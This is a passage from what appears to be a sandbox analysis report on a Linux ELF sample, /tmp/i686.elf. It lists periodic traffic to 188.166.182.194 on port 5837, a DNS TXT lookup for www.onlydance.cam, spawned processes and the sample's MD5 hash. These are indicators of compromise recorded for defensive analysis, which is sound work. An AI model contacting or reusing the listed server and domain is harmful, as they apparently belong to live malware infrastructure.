                                                            Jan 6, 2025 00:55:28.665851116 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:38.669121981 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:38.674036026 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:48.674046993 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:48.681691885 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:58.682614088 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:58.687555075 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:56:08.687284946 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:56:08.692222118 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:56:18.694644928 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:56:18.699529886 CET583754640188.166.182.194192.168.2.23
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 6, 2025 00:52:50.350769043 CET6022153192.168.2.23208.67.220.220
                                                            Jan 6, 2025 00:52:50.367485046 CET5360221208.67.220.220192.168.2.23
                                                            Jan 6, 2025 00:52:51.373524904 CET4127719302192.168.2.2374.125.250.129
                                                            Jan 6, 2025 00:52:51.831336021 CET193024127774.125.250.129192.168.2.23
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 6, 2025 00:52:50.350769043 CET192.168.2.23208.67.220.2200x4e49Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 6, 2025 00:52:50.367485046 CET208.67.220.220192.168.2.230x4e49No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false

                                                            System Behavior

                                                            Start time (UTC):23:52:48
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:/tmp/i686.elf
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0

                                                            Start time (UTC):23:52:49
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0

                                                            Start time (UTC):23:52:49
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0

                                                            Start time (UTC):23:52:49
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0

                                                            Start time (UTC):23:52:49
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0

                                                            Start time (UTC):23:52:49
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91792 bytes
                                                            MD5 hash:8f0239e6b5b39a97e8e64ff9217b00a0